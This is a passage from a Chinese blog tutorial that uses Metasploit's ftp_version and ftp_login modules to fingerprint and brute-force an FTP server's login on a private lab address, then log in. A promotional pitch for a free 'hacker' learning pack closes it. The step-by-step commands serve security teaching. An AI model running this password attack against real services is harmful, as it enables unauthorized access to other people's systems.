课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali与编程,学习更多网络攻防干货!
3、Kali与编程每天准时更新,敬请学习和关注!
3.1 运行ftp_version 漏洞利用框架,如下图所示。
命令:run
获取到FTP Banner 如下图所示:Microsoft FTP Service\x0d\x0a
3.2 返回 ftp_version漏洞框架的上一层,如下图所示。
命令:back
3.3 检索Metasploit(msf)框架对于ftp_login的漏洞模块,如下图所示。
命令:search ftp_login
3.4 利用见多到的ftp_login漏洞模块,如下图所示。
命令:use auxiliary/scanner/ftp/ftp_login
3.5 查看ftp_login漏洞利用模块的参数,如下图所示。
命令:show options
RHOSTS:受害者主机IP
THREADS:线程数
USERNAME:FTP用户名
PASS_FILE:密码文件
3.6 设置RHOSTS参数,如下图所示。
命令:set rhosts 192.168.78.165
3.7 设置USERNAME参数,如下图所示。
命令:set username test1
3.8 设置PASS_FILE参数,如下图所示。
命令:set pass_file /root/pass.txt
3.8 设置THREADS参数,如下图所示。
命令:set threads 5
在这里插入图片描述
3.9 查看参数配置结果(参数是否配置成功),如下图所示。
命令:show options
3.10 执行ftp_login漏洞利用模块,如下图所示。
命令:run
如下图所示,ftp服务暴力破解成功。
3.11 命令行远程登录ftp服务,如下图所示。
命令:ftp IP(ftp 192.168.78.165)
3.12 浏览器URL栏登录FTP服务,如下图所示。
步骤:URl栏输入ftp://IP 在弹出窗口利用破解到的账户信息登录。
3.13 浏览器登录FTP服务成功,如下图所示。
最后
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~
😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓
今天在这里吐血推荐全套《黑客&网络安全入门&进阶学习资源包》, 扫描即可获取
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
2️⃣视频配套资料&国内外网安书籍、文档
① 文档和书籍资料
② 黑客技术
因篇幅有限,仅展示部分资料
3️⃣网络安全源码合集+工具包
4️⃣网络安全面试题
5️⃣汇总
所有资料 ⚡️ ,朋友们如果有需要全套 《网络安全入门+进阶学习资源包》,扫码获取~